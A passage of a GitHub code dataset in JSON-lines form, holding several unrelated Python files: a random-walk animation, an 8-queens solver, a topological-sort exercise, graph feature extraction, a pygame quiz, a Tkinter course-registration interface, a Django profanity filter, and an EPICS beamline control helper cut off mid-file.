+{"seq_id":"20727554587","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport random\n\nstart = None\ncur_node = None\npath = []\n\n\n\ndef update(i,n,layout,G,ax,end):\n global cur_node,path\n ax.clear()\n nodes_color = ['#1f78b4']*len(G.nodes)\n nodes_color[cur_node]='#ff0000'\n if path[-1] !=end:\n if path[-1]==cur_node:\n pass\n else:\n path.append(cur_node)\n\n if(len(list(G.adj[cur_node]))>0 and cur_node != end):\n cur_node = random.sample(list(G.adj[cur_node]),1)[0]\n nx.draw(G,pos=layout,ax=ax,node_color=nodes_color,with_labels=True)\n global start\n ax.set_title(\"Start {}, End {}\\nPath {}\".format(start,end,path))\n\n\n\ndef random_walk_animation():\n global start,cur_node\n fig, ax = plt.subplots(figsize=(6,4))\n \n # G=nx.barbell_graph(5,2) \n G=nx.gnm_random_graph(10,20)\n layout = nx.spring_layout(G)\n end = random.sample(list(G.nodes),1)[0]\n \n if start == None:\n start = random.sample(list(G.nodes),1)[0]\n cur_node = start\n path.append(cur_node)\n nodes_color = ['#1f78b4']*len(G.nodes)\n nodes_color[cur_node]='#ff0000'\n nx.draw(G,pos=layout,ax=ax,node_color=nodes_color,with_labels=True)\n \n ani = FuncAnimation(fig,update,frames=100,interval=500,fargs=(12,layout,G,ax,end))\n ani.save('animation_1.gif', writer='imagemagick')\n # plt.show()\n\n\n \n\n\nrandom_walk_animation()","repo_name":"Rougnt/RandomWalk","sub_path":"mygraph.py","file_name":"mygraph.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40990383083","text":"import time\n\nclass Cell:\n \"\"\"A Cell is a square on the chessboard, which might contain a queen. A Cell\n knows where it is on the Board, it's current state, and can interact with\n the Board through queening.\n \"\"\"\n def __init__(self, idx, board):\n self.idx = idx\n self.board = board\n self.row = idx // 8 + 1\n self.col = idx % 8 + 1\n self.is_queen = False\n self.is_attacked = False\n\n \"\"\"The cell has a queen on it, and the Board updates newly attacked cells.\n \"\"\"\n def queen(self):\n self.is_queen = True\n self.board.calculate_attacked(self)\n\n \"\"\"The cell no longer has a queen on it, and the Board recalculates all\n attacked cells.\n \"\"\"\n def unqueen(self):\n self.is_queen = False\n self.board.calculate_all_attacked()\n\nclass Board:\n \"\"\"The Board manages the state of it's Cells and provides methods for\n calculating which cells are currently attacked, and which cells a queen\n that is placed will be able to attack.\n \"\"\"\n def __init__(self):\n self.cells = [Cell(i, self) for i in range(64)]\n\n def reset(self):\n for cell in self.cells:\n cell.is_queen = False\n cell.is_attacked = False\n\n \"\"\"For debugging purposes.\"\"\"\n def display(self):\n for r in range(8):\n for c in range(8):\n cell = self.cells[r * 8 + c]\n if cell.is_queen:\n print(\" [Q]\", end=\" \")\n else:\n print(\" {:2} \".format(cell.idx), end=\" \")\n print()\n\n \"\"\"Queens a cell, if it is legal to do so given the rules.\"\"\"\n def attempt_queening(self, cell_idx):\n cell = self.cells[cell_idx]\n if cell.is_attacked == False:\n cell.queen()\n\n \"\"\"The current queens on the board.\"\"\"\n def queens(self):\n queens = []\n for cell in self.cells:\n if cell.is_queen:\n queens += [cell]\n return queens\n\n \"\"\"Sets newly attacked cells for a placed queen.\"\"\"\n def calculate_attacked(self, cell):\n for c in self.attackable_cells(cell):\n c.is_attacked = True\n\n 
\"\"\"Calculates all attacked cells based on the current queen set.\"\"\"\n def calculate_all_attacked(self):\n for cell in self.cells:\n cell.is_attacked = False\n for queen in self.queens():\n self.calculate_attacked(queen)\n\n \"\"\"Determines which cells are attackable from the position of a Cell.\"\"\"\n def attackable_cells(self, cell):\n cells = []\n cells.extend(self.cells_in_dir(cell, self.nw_cell))\n cells.extend(self.cells_in_dir(cell, self.n_cell))\n cells.extend(self.cells_in_dir(cell, self.ne_cell))\n cells.extend(self.cells_in_dir(cell, self.w_cell))\n cells.extend(self.cells_in_dir(cell, self.e_cell))\n cells.extend(self.cells_in_dir(cell, self.sw_cell))\n cells.extend(self.cells_in_dir(cell, self.s_cell))\n cells.extend(self.cells_in_dir(cell, self.se_cell))\n return cells\n\n \"\"\"Recursively determines and adds cells in a given direction until the edge\n of the board is reached.\n \"\"\"\n def cells_in_dir(self, cell, dir, acc_cells=[]):\n next_cell = dir(cell)\n if next_cell is not None:\n return self.cells_in_dir(next_cell, dir, acc_cells + [next_cell])\n else:\n return acc_cells\n\n def nw_cell(self, cell):\n if cell.row > 1 and cell.col > 1:\n return self.cells[cell.idx - 9]\n\n def n_cell(self, cell):\n if cell.row > 1:\n return self.cells[cell.idx - 8]\n\n def ne_cell(self, cell):\n if cell.row > 1 and cell.col < 8:\n return self.cells[cell.idx - 7]\n\n def w_cell(self, cell):\n if cell.col > 1:\n return self.cells[cell.idx - 1]\n\n def e_cell(self, cell):\n if cell.col < 8:\n return self.cells[cell.idx + 1]\n\n def sw_cell(self, cell):\n if cell.row < 8 and cell.col > 1:\n return self.cells[cell.idx + 7]\n\n def s_cell(self, cell):\n if cell.row < 8:\n return self.cells[cell.idx + 8]\n\n def se_cell(self, cell):\n if cell.row < 8 and cell.col < 8:\n return self.cells[cell.idx + 9]\n\nclass Engine:\n \"\"\"Engine connects the elements of the environment required to execute a\n strategy to solve the 8 queens problem.\n \"\"\"\n def __init__(self, board):\n self.board = board\n self.solutions = []\n\n def reset(self):\n self.board.reset()\n self.solutions = []\n\n \"\"\"Result output.\"\"\"\n def output_solutions(self, time):\n print(\"Found {} solutions in {:.2f} seconds:\".format(len(self.solutions), time))\n\n \"\"\"Runs a strategy in a clean environment and provides output.\"\"\"\n def run(self, strategy):\n self.reset()\n print(\"using: {}\".format(strategy.__name__))\n t = time.time()\n strategy(board, self.solutions)\n self.output_solutions(time.time() - t)\n\nclass Strategy:\n \"\"\"Strategy contains different search strategies that can be used to find\n solutions to the 8 queens problem.\n \"\"\"\n\n \"\"\"Checks the goal state and if achieved, adds the current state to the\n solution set.\"\"\"\n def check_and_add_solution(self, queens, solutions):\n if len(queens) == 8:\n solutions.append([queen.idx for queen in queens])\n\n \"\"\"A strategy where each each cell is inspected linearly for queening,\n queened if possible, then when all legal queens have been placed a board\n configuration is examined for success. 
Then, the last placed queen is\n backtracked and the next cell after that cell is inspected.\"\"\"\n def linear_backtrack(self, board, solutions):\n cell_idx = 0\n starting_cell_idx = 0\n # There must be a queen in the first row\n while starting_cell_idx < 8:\n board.attempt_queening(cell_idx)\n # if we're at the end of a run\n if cell_idx == 63:\n self.check_and_add_solution(board.queens(), solutions)\n cell_idx, starting_cell_idx = self.backtrack(cell_idx, starting_cell_idx, board.queens())\n cell_idx += 1\n\n \"\"\"Backtrack the last placed queen (or two if required) and return the\n indices of the current cell under examination and the starting cell for the\n next run through of the board.\"\"\"\n def backtrack(self, cell_idx, starting_cell_idx, queens):\n queens[-1].unqueen()\n\n # if there was only one queen, progress to next run\n if len(queens) == 1:\n return starting_cell_idx, starting_cell_idx + 1\n\n # if the last queen was on an end cell\n elif queens[-1].idx == 63:\n # unqueen the second last queen\n queens[-2].unqueen()\n # if there are no queens left, progress to next run\n if len(queens) == 2:\n return starting_cell_idx, starting_cell_idx + 1\n # otherwise, continue the run from the second last queen\n else:\n return queens[-2].idx, starting_cell_idx\n\n # otherwise, continue the run from the last queen\n else:\n return queens[-1].idx, starting_cell_idx\n\n \"\"\"A strategy where every board combination is generated then inspected,\n with the limitation that we can only place a single queen in any row or\n column, which we know is required because of problem domain knowledge.\"\"\"\n def brute_force(self, board, solutions):\n for q1 in range(8):\n for q2 in set(range(8)) - { q1 }:\n for q3 in set(range(8)) - { q1, q2 }:\n for q4 in set(range(8)) - { q1, q2, q3 }:\n for q5 in set(range(8)) - { q1, q2, q3, q4 }:\n for q6 in set(range(8)) - { q1, q2, q3, q4, q5 }:\n for q7 in set(range(8)) - { q1, q2, q3, q4, q5, q6 }:\n for q8 in set(range(8)) - { q1, q2, q3, q4, q5, q6, q7 }:\n board.reset()\n board.attempt_queening(q1 + 0 * 8)\n board.attempt_queening(q2 + 1 * 8)\n board.attempt_queening(q3 + 2 * 8)\n board.attempt_queening(q4 + 3 * 8)\n board.attempt_queening(q5 + 4 * 8)\n board.attempt_queening(q6 + 5 * 8)\n board.attempt_queening(q7 + 6 * 8)\n board.attempt_queening(q8 + 7 * 8)\n self.check_and_add_solution(board.queens(), solutions)\n\n# Establish state and run each strategy with output\nif __name__ == '__main__':\n board = Board()\n engine = Engine(board)\n strategy = Strategy()\n\n engine.run(strategy.brute_force)\n engine.run(strategy.linear_backtrack)\n","repo_name":"PhilipCastiglione/learning-machines","sub_path":"miscellany/8_queens_OO.py","file_name":"8_queens_OO.py","file_ext":"py","file_size_in_byte":9012,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"24392418576","text":"# 위상 정렬\nfrom collections import deque\nfrom collections import defaultdict\n\nn = int(input())\nbefore, after, indegree, time = defaultdict(list), defaultdict(list), defaultdict(int), defaultdict(int)\nmax_node = defaultdict(int)\nstart = []\nfor i in range(1, n+1):\n read = list(map(int, input().split()))\n time[i] = read[0]\n indegree[i] += read[1]\n for v in read[2:]:\n before[i].append(v)\n after[v].append(i)\n if not indegree[i]:\n start.append(i)\n\nqueue = deque(start)\nwhile queue:\n node = queue.popleft()\n for adj in after[node]:\n indegree[adj] -= 1\n if indegree[adj] == 0:\n queue.append(adj)\n # 선행 노드 중, 가장 시간이 오래 걸린 
노드 찾기\n max_node = before[adj][0]\n for v in before[adj]:\n if time[max_node] < time[v]:\n max_node = v\n time[adj] += time[max_node]\n\nelse:\n print(max(time.values()))","repo_name":"olzlrlo/algorithms","sub_path":"BOJ/02056.py","file_name":"02056.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14325440733","text":"from scipy import sparse\nimport numpy as np\nimport time\nfrom fast_histogram import histogram1d\nimport matlab.engine\n\neng = matlab.engine.start_matlab()\n\n\ndef fgsd_features(graph_list):\n\n S_max = 0\n S_list = []\n print('Computing pseudo inverse...')\n t = time.time()\n for i, A in enumerate(graph_list):\n if (i + 1) % 1000 == 0:\n print('num graphs processed so far: ', i + 1)\n A = np.array(A.todense(), dtype=np.float32)\n D = np.sum(A, axis=0)\n L = np.diag(D) - A\n\n ones_vector = np.ones(L.shape[0])\n try:\n fL = np.linalg.pinv(L)\n except np.linalg.LinAlgError:\n fL = np.array(eng.fgsd_fast_pseudo_inverse(matlab.double(L.tolist()), nargout=1))\n fL[np.isinf(fL)] = 0\n fL[np.isnan(fL)] = 0\n\n S = np.outer(np.diag(fL), ones_vector) + np.outer(ones_vector, np.diag(fL)) - 2 * fL\n if S.max() > S_max:\n S_max = S.max()\n S_list.append(S)\n\n print('S_max: ', S_max)\n print('Time Taken: ', time.time() - t)\n\n feature_matrix = []\n nbins = 1000000\n range_hist = (0, S_max)\n print('Computing histogram...')\n t = time.time()\n for i, S in enumerate(S_list):\n if (i + 1) % 1000 == 0:\n print('num graphs processed so far: ', i + 1)\n # hist, _ = np.histogram(S.flatten(), bins=nbins, range=range_hist)\n hist = histogram1d(S.flatten(), bins=nbins, range=range_hist)\n hist = sparse.csr_matrix(hist)\n feature_matrix.append(hist)\n print('Time Taken: ', time.time() - t)\n\n feature_matrix = sparse.vstack(feature_matrix)\n return feature_matrix\n","repo_name":"vermaMachineLearning/Universal-Graph-Embedding-Neural-Network","sub_path":"utils/fast_fgsd_features.py","file_name":"fast_fgsd_features.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"66"} +{"seq_id":"70893422931","text":"import pygame\nfrom quizz.class_ecra_menu import Menu\nfrom quizz.class_ecra_jogar import Jogar\nfrom quizz.class_ecra_login import Login\n\nclass Jogo:\n titulo = \"Quizz\"\n tamanho_ecra = (768, 768)\n estado = None\n eventos = None\n ecra = None\n relogio = None\n ecras = {\n \"login\": Login,\n \"menu\": Menu,\n \"jogar\": Jogar,\n \"perguntas\": Menu,\n \"pontuacoes\": Menu,\n \"nivelJogo\": Menu,\n }\n nome_utilizador = None\n categorias_seleccionadas = []\n centro_ecra = None\n\n def __init__(self):\n pygame.font.init()\n pygame.display.set_caption(self.titulo)\n self.relogio = pygame.time.Clock()\n self.ecra = pygame.display.set_mode(self.tamanho_ecra)\n self.centro_ecra = self.ecra.get_rect().center\n self.estado = self.ecras[\"login\"](self)\n\n self.construir()\n\n def construir(self):\n # Iniciar ciclo\n while True:\n self.eventos_globais()\n self.estado.construir(self)\n # Atualizar o ecra 60 vezes a cada segundo\n pygame.display.update()\n self.relogio.tick(60)\n\n def eventos_globais(self):\n self.eventos = pygame.event.get()\n for evento in self.eventos:\n # Se evento for do tipo QUIT\n if evento.type == pygame.QUIT:\n # Fechar janela e sai do jogo\n pygame.quit()\n exit()\n 
","repo_name":"drweizak/quizz-advanced-workshop","sub_path":"quizz/class_jogo.py","file_name":"class_jogo.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42899438347","text":"import re\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tkinter\nfrom tkinter import ttk\nfrom tkinter.messagebox import showinfo, askyesno\nfrom static_view import StaticView\nfrom register_controller import RegisterController\ndef clear_treeview(treeview):\n for i in treeview.get_children():\n treeview.delete(i)\ndef register_to_tuple(register):\n return tuple([register.register_id,register.subject.subject_id,\n register.subject.name,register.student.student_id,\n register.student.name,register.register_time])\nclass RegisterView:\n def __init__(self,frame,student_view,subject_view):\n super().__init__()\n self.frame = frame\n self.registers = []\n self.add_table_register()\n self.create_search_frame()\n self.creat_frame_sort()\n self.create_register_frame(student_view,subject_view)\n self.create_btn_frame(student_view,subject_view)\n\n def add_table_register(self):\n column = ['c1','c2','c3','c4','c5','c6']\n self.table_register = ttk.Treeview(self.frame,columns=column,show='headings',height=9,selectmode='browse')\n self.table_register.grid(column=0,row=0,columnspan=3,sticky=tkinter.NSEW)\n\n style = ttk.Style()\n style.theme_use('alt') # other theme can use: clam, classic, default\n style.configure('my.Treeview.Heading', font=('Calibri', 11, 'bold'),\n background='#33CCFF', foreground='#ffffff')\n self.table_register.configure(style='my.Treeview')\n\n self.table_register.heading('c1',text='Mã đăng ký')\n self.table_register.heading('c2',text='Mã môn học')\n self.table_register.heading('c3',text='Tên môn học')\n self.table_register.heading('c4',text='Mã sinh viên')\n self.table_register.heading('c5',text='Họ và tên')\n self.table_register.heading('c6',text='Thời gian')\n\n self.table_register.column(0,stretch=tkinter.NO,width=150,minwidth=150,anchor=tkinter.CENTER)\n self.table_register.column(1,stretch=tkinter.NO,width=150,minwidth=150,anchor=tkinter.CENTER)\n self.table_register.column(2,stretch=tkinter.NO,width=250,minwidth=250)\n self.table_register.column(3,stretch=tkinter.NO,width=150,minwidth=150,anchor=tkinter.CENTER)\n self.table_register.column(4,stretch=tkinter.NO,width=200,minwidth=200)\n self.table_register.column(5,stretch=tkinter.NO,width=250,minwidth=250,anchor=tkinter.CENTER)\n\n def create_search_frame(self):\n self.search_var = tkinter.StringVar()\n frm_search = ttk.LabelFrame(self.frame, text='Tìm kiếm')\n # config set all columns have same width space\n frm_search.columnconfigure(0, weight=1, uniform='fred')\n frm_search.columnconfigure(1, weight=1, uniform='fred')\n frm_search.grid(row=1, column=0, sticky=tkinter.NSEW, pady=4, padx=4)\n # add combobox\n ttk.Label(frm_search, text='Tiêu chí tìm kiếm:'). \\\n grid(row=0, column=0, sticky=tkinter.W, pady=4, padx=4)\n type = ['Theo mã sinh viên','Theo mã môn học']\n self.combo_search = ttk.Combobox(frm_search, textvariable=self.search_var,values=type)\n self.combo_search.grid(row=1, column=0, padx=4, pady=4, sticky=tkinter.W,\n ipady=4, ipadx=4)\n # add search part\n ttk.Label(frm_search, text='Từ khóa:'). 
\\\n grid(row=0, column=1, sticky=tkinter.W, padx=4, pady=4)\n self.search_entry = ttk.Entry(frm_search)\n self.search_entry.grid(row=1, column=1, sticky=tkinter.EW, padx=4, pady=4,\n ipadx=4, ipady=4)\n\n self.btn_search = ttk.Button(frm_search, text='Tìm kiếm', width=15,command=self.search_by_key)\n self.btn_search.grid(row=2, column=1, padx=4, pady=4)\n\n def creat_frame_sort(self):\n self.sort_var = tkinter.IntVar(value=0)\n frm_sort= ttk.LabelFrame(self.frame, text='Sắp xếp')\n # config set all columns have same width space\n frm_sort.columnconfigure(0, weight=1, uniform='fred')\n frm_sort.columnconfigure(1, weight=1, uniform='fred')\n frm_sort.grid(row=1, column=1, sticky=tkinter.NSEW, pady=4, padx=4)\n\n ttk.Radiobutton(frm_sort, text='Thứ tự đăng ký sớm-muộn', value=1,\n variable=self.sort_var,command=self.sort_by_time). \\\n grid(row=0, column=0, pady=4, padx=4, sticky=tkinter.W)\n ttk.Radiobutton(frm_sort, text='Thứ tự đăng ký muộn-sớm',\n value=2, variable=self.sort_var,command=self.sort_by_time_d). \\\n grid(row=1, column=0, pady=4, padx=4, sticky=tkinter.W)\n ttk.Radiobutton(frm_sort, text='Theo mã môn học tăng dần',\n value=3, variable=self.sort_var,command=self.sort_by_id_sub). \\\n grid(row=0, column=1, pady=4, padx=4, sticky=tkinter.W)\n ttk.Radiobutton(frm_sort, text='Theo mã sinh viên tăng dần',\n value=4, variable=self.sort_var,command=self.sort_by_id_student). \\\n grid(row=1, column=1, pady=4, padx=4, sticky=tkinter.W)\n\n def create_register_frame(self,student_view,subject_view):\n frm_register = ttk.LabelFrame(self.frame,text='Đăng ký môn học')\n frm_register.grid(column=2,row=1,sticky=tkinter.NSEW,padx=4,pady=4)\n frm_register.grid_columnconfigure(0,weight=1,uniform='fred')\n frm_register.grid_columnconfigure(1,weight=1,uniform='fred')\n\n frm_register.rowconfigure(0, weight=1, uniform='fred')\n frm_register.rowconfigure(1, weight=1, uniform='fred')\n frm_register.rowconfigure(2, weight=1, uniform='fred')\n\n ttk.Label(frm_register,text='Mã sinh viên').grid(column = 0 ,row=0,pady=4,padx=16)\n ttk.Label(frm_register,text='Mã môn học').grid(column = 0,row=1,padx=16,pady=4)\n\n self.entry_id_student = ttk.Entry(frm_register)\n self.entry_id_student.grid(column=1,row=0,padx=16,pady=4)\n\n self.entry_id_sub = ttk.Entry(frm_register)\n self.entry_id_sub.grid(column=1,row=1,padx=16,pady=4)\n\n self.btn_ok = ttk.Button(frm_register,text='REGISTER',command=lambda : self.register_subject(student_view,subject_view))\n self.btn_ok.grid(column=1,row=2,pady=4,padx=4)\n\n def create_btn_frame(self,students,subjects):\n self.frm_btn = ttk.LabelFrame(self.frame,text='Các thao tác')\n self.frm_btn.grid(column=0,row=2,columnspan=3,sticky=tkinter.NSEW)\n self.frm_btn.grid_columnconfigure(0,weight=1)\n self.frm_btn.grid_columnconfigure(1,weight=1)\n self.frm_btn.grid_columnconfigure(2,weight=1)\n self.frm_btn.grid_columnconfigure(3,weight=1)\n\n\n self.btn_load = ttk.Button(self.frm_btn,text='Làm mới',command=lambda :self.load_register(students,subjects))\n self.btn_load.grid(column=0,row=0,pady=8,padx=8,ipady=8,ipadx=16)\n\n self.btn_static = ttk.Button(self.frm_btn, text='Thống kê',command=self.static)\n self.btn_static.grid(column=1, row=0,pady=8,padx=8,ipady=8,ipadx=16)\n\n self.btn_draw = ttk.Button(self.frm_btn, text='Vẽ biểu đồ',command=self.draw_chart)\n self.btn_draw.grid(column=2, row=0,pady=8,padx=8,ipady=8,ipadx=16)\n\n self.btn_delete = ttk.Button(self.frm_btn, text='Xoá',command=self.delete_item)\n self.btn_delete.grid(column=3, row=0,pady=8,padx=8,ipady=8,ipadx=16)\n\n 
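# Pulls the full registration list from RegisterController.read_data and\n # redraws the table; both the student and subject lists must be non-empty.\n 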
def load_register(self,students,subject):\n self.registers.clear()\n s = RegisterController()\n if len(students.students) == 0 or len(subject.subjects) == 0:\n showinfo(message='Lỗi danh sách rỗng')\n else:\n self.registers = s.read_data(students.students,subject.subjects)\n self.show_table_register()\n\n def show_table_register(self):\n clear_treeview(self.table_register)\n index = 1\n self.table_register.selection_clear()\n for i in self.registers:\n if index % 2 == 0:\n tag = 'even'\n else:\n tag = 'odd'\n self.table_register.insert('', tkinter.END, values=register_to_tuple(i), tags=(tag,))\n index += 1\n\n def sort_by_time(self):\n s = RegisterController()\n s.sort_by_time(self.registers)\n self.show_table_register()\n\n def sort_by_time_d(self):\n s = RegisterController()\n s.sort_by_time_d(self.registers)\n self.show_table_register()\n\n def sort_by_id_sub(self):\n s = RegisterController()\n s.sort_by_id_sub(self.registers)\n self.show_table_register()\n\n def sort_by_id_student(self):\n s = RegisterController()\n s.sort_by_id_student(self.registers)\n self.show_table_register()\n\n def search_by_key(self):\n type = self.combo_search.get()\n key = self.search_entry.get()\n s = RegisterController()\n if len(type) == 0 or len(key) == 0:\n showinfo(message='Lỗi key hoặc tiêu chí tìm kiếm không được rỗng')\n else:\n if type == 'Theo mã sinh viên':\n pattern = '^SV\\\\d{4}$'\n if re.match(pattern,key):\n self.registers = s.search_by_id_student(self.registers,key)\n self.show_table_register()\n else:\n showinfo(message='Lỗi mã sinh vien không hợp lệ')\n else:\n if key.isdigit() is True and int(key) > 1000:\n self.registers = s.search_by_id_subject(self.registers,int(key))\n self.show_table_register()\n else:\n showinfo(message='Lỗi mã môn học phải là số nguyên lớn hơn 1000')\n def check_register_exist(self,register):\n for i in self.registers:\n if i.student.student_id == register.student.student_id and i.subject.subject_id == register.subject.subject_id:\n return True\n return False\n def register_subject(self,students,subjects):\n s = RegisterController()\n id_student = self.entry_id_student.get()\n id_subject = self.entry_id_sub.get()\n pattern = '^SV\\\\d{4}$'\n if re.match(pattern, id_student) and id_subject.isdigit() and int(id_subject) > 1000:\n register = s.add(students.students,subjects.subjects,int(id_subject),id_student)\n if register is not None:\n if self.check_register_exist(register):\n showinfo(message='Sinh viên đã đăng ký môn học trước đó')\n else:\n self.registers.append(register)\n self.show_table_register()\n showinfo(message='Đăng ký thành cong')\n else:\n showinfo(message='Sinh viên hoặc môn học không tồn tại')\n else:\n showinfo(message='Mã sinh viên hoặc mã môn học không hợp lệ')\n\n def delete_item(self):\n item = self.table_register.selection()\n if len(item) == 0:\n showinfo(message='Lỗi danh sách rỗng')\n else:\n id = self.table_register.set(item[0], column='c1')\n for i in self.registers:\n if i.register_id == int(id):\n self.registers.remove(i)\n\n if len(item) == 0:\n showinfo(message='Lỗi danh sách rỗng')\n else:\n ask = askyesno(message='Bạn có chắc chắn muốn xóa ?')\n if ask:\n for i in item:\n self.table_register.delete(i)\n showinfo(message='Xóa thành công')\n\n def create_dic(self):\n dic = {}\n for i in self.registers:\n if i.subject.subject_id in dic:\n dic[i.subject.subject_id] += 1\n else:\n dic[i.subject.subject_id] = 1\n return dic\n def getname(self,id):\n for i in self.registers:\n if i.subject.subject_id == id:\n return i.subject.name\n\n def 
static(self):\n list = []\n dic = self.create_dic()\n if len(dic) == 0 :\n showinfo(message='Lỗi danh sach rỗng')\n else:\n stt = 1\n for i in dic.keys():\n list.append(tuple([stt,i,self.getname(i),dic[i]]))\n stt += 1\n stat = StaticView(list)\n stat.mainloop()\n def draw_chart(self):\n dic = self.create_dic()\n if len(dic) == 0 :\n showinfo(message='Lỗi danh sach rỗng')\n else:\n num_subjects = []\n lable = []\n for i in dic.keys():\n num_subjects.append(dic[i])\n lable.append(i)\n\n subjects = np.array(num_subjects)\n plt.pie(subjects, labels=lable, shadow=True, startangle=45,\n autopct='%1.2f%%', textprops={'color': '#ffffff'})\n plt.title('Biểu đồ phân bố đăng ký môn học')\n plt.legend(loc = 1 ,title = 'Môn học: ')\n plt.show()\n\n\n","repo_name":"anhduc1234567/PythonBase","sub_path":"ProjectEnd/register_view.py","file_name":"register_view.py","file_ext":"py","file_size_in_byte":13123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17205206783","text":"from django import template\n\nregister = template.Library()\n\n\nCENSOR = [\n 'бля', 'пизд', 'еба','хуй', 'хуе',\n]\n\n@register.filter(name='censor')\ndef censor(text: str):\n text_list = text.split()\n for i in range(len(text_list)):\n for c in CENSOR:\n if text_list[i].lower().find(c) >= 0:\n text_list[i] = '***'\n return ' '.join(text_list)\n","repo_name":"irynaludanova/wow_django","sub_path":"blog/templatetags/custom_filters.py","file_name":"custom_filters.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"22140934382","text":"\"\"\"\nCreated on Wed Oct 27 10:28:14 2021\n\n@author: graceluo\n\nCreate and get PVobjects\n\n\"\"\"\n#!/home/beams/USERBNP/.conda/envs/py36/bin/python\n\nimport epics, sys, datetime\nimport numpy as np\nfrom misc import getCurrentTime\nimport epics.devices\nfrom epics import caput, caget\n\n# Eiger object is create for accessing camera related attributes\nclass eiger(object):\n def __init__(self, cam_pv_str, file_pv_str):\n self.pvstr = cam_pv_str\n self.cam = epics.devices.AD_Camera(cam_pv_str)\n self.fileIO = epics.devices.AD_FilePlugin(file_pv_str)\n \n def setNumTriggers(self, numTriggers):\n caput('%sNumTriggers'%self.pvstr, numTriggers)\n \n def getNumTriggers(self):\n return caget('%sNumTriggers'%self.pvstr)\n\n\nclass pvObject(object):\n def __init__(self, pv_str, pv_key, onchange_callback=False):\n self.pv = epics.PV(pv_str)\n self.pvname = pv_key\n self.putvalue = self.pv.value\n self.put_complete = 0\n self.motor_ready = 1\n self.time_pre = None #datetime of PV when connected or previous value change\n self.time_delta = 0 #time difference in sec btw its value change\n if onchange_callback:\n self.pv.add_callback(self.onChanges)\n \n \n def onPutComplete(self, pvname=None, **kws):\n sys.stdout.write('%s: Finish updating PV %s with value of %s\\n'\\\n %(getCurrentTime(), self.pvname, str(self.putvalue)))\n self.put_complete = 1\n \n def onChanges(self, pvname=None, **kws):\n \n if self.time_pre is None: \n self.time_pre = datetime.datetime.now()\n else:\n curtime = datetime.datetime.now()\n self.time_delta = (curtime-self.time_pre).seconds\n self.time_pre = curtime\n \n sys.stdout.write('%s: previous time:%s, delta time:%s\\n'\n %(getCurrentTime(), self.time_pre, self.time_delta))\n\n \n def put_callback(self, v = None):\n self.put_complete = 0\n if v is not None:\n self.putvalue = v\n self.pv.put(self.putvalue, 
callback=self.onPutComplete)\n\n def motorReady(self, rqspv, tolerance = 4e-2):\n rqsvalue = np.round(rqspv.value, 2)\n if abs((np.round(self.pv.value, 2) - rqsvalue)) < tolerance:\n self.motor_ready = 1\n else:\n rqspv.put(rqsvalue)\n self.motor_ready = 0\n \n \ndef definePVs():\n pvs = {'x_center_Rqs':'9idbTAU:SM:PX:RqsPos', 'x_center_Act':'9idbTAU:SM:PX:ActPos',\n 'y_center_Rqs':'9idbTAU:SY:PY:RqsPos', 'y_center_Act':'9idbTAU:SY:PY:ActPos',\n 'z_value_Rqs':'9idbTAU:SM:SZ:RqsPos', 'z_value_Act':'9idbTAU:SM:SZ:ActPos',\n 'tomo_rot_Rqs':'9idbTAU:SM:CT:RqsPos', 'tomo_rot_Act':'9idbTAU:SM:CT:ActPos',\n 'sm_rot_Rqs':'9idbTAU:SM:ST:RqsPos', 'sm_rot_Act':'9idbTAU:SM:ST:ActPos',\n 'x_width':'9idbBNP:scan1.P1WD', 'y_width':'9idbBNP:scan2.P1WD',\n 'x_step':'9idbBNP:scan1.P1SI', 'y_step':'9idbBNP:scan2.P1SI',\n 'dwell':'9idbBNP:scanTran3.C', 'BDA_pos':'9idbTAU:UA:UX:RqsPos',\n 'det_time':'9idbBNP:3820:ElapsedReal', '1D_time':'9idbBNP:scanTran4.F',\n 'xmap_stp':'9idbXMAP:StopAll', 'netCDF_stp':'9idbXMAP:netCDF1:Capture',\n 'mcs_stp':'9idbBNP:3820:StopAll', 'mcs_status':'9idbBNP:3820:Acquiring',\n 'xmap_status':'9idbXMAP:Acquiring', 'netCDF_save':'9idbXMAP:netCDF1:WriteFile',\n 'netCDF_status':'9idbXMAP:netCDF1:WriteFile_RBV',\n 'collect_mode':'9idbXMAP:CollectMode',\n 'y_motor_ready':'9idbTAU:SY:Ps:Ready', 'xztp_motor_ready':'9idbTAU:SM:Ps:Ready',\n 'x_piezo_val':'9idbTAU:M7009.VAL', 'y_piezo_val':'9idbTAU:M7010.VAL',\n 'scan2Record':'9idbBNP:scan2',\n \n \n\n 'x_motorMode':'9idbTAU:SM:Ps:xMotionChoice.VAL',\n 'y_motorMode':'9idbTAU:SY:Ps:yMotionChoice.VAL',\n 'x_updatecenter':'9idbBNP:scan1.P1CP', 'y_updatecenter':'9idbBNP:scan2.P1CP',\n # 'x_setcenter':'9idbBNP:aoRecord11.PROC', 'y_setcenter':'9idbBNP:aoRecord12.PROC',\n 'piezo_xCenter':'9idbTAU:SM:Ps:xCenter.PROC',\n 'piezo_yCenter':'9idbTAU:SY:Ps:yCenter.PROC',\n 'tot_lines':'9idbBNP:scan2.NPTS', 'cur_lines':'9idbBNP:scan2.CPT',\n 'tot_pts_perline':'9idbBNP:scan1.NPTS',\n \n\n 'CryoCon1:In_1':'9idbCRYO:CryoCon1:In_1:Temp.VAL',\n 'CryoCon1:In_3':'9idbCRYO:CryoCon1:In_3:Temp.VAL',\n 'CryoCon1:In_2':'9idbCRYO:CryoCon1:In_2:Temp.VAL',\n 'CryoCon3:In_2':'9idbCRYO:CryoCon3:In_2:Temp.VAL',\n 'CryoCon3:Loop_2':'9idbCRYO:CryoCon3:Loop_2:SetControl.VAL',\n\n\n 'run':'9idbBNP:scan2.EXSC', 'wait':'9idbBNP:scan2.WAIT', 